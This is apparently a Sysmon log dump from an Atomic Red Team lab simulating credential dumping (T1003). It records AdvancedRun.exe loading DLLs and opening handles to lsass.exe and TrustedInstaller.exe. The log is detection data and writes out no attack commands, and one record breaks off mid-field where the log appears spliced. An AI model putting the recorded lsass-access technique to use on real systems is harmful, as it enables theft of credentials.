17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.512{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003952965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003952955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 
(rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003952948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft 
17:28:39.339{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
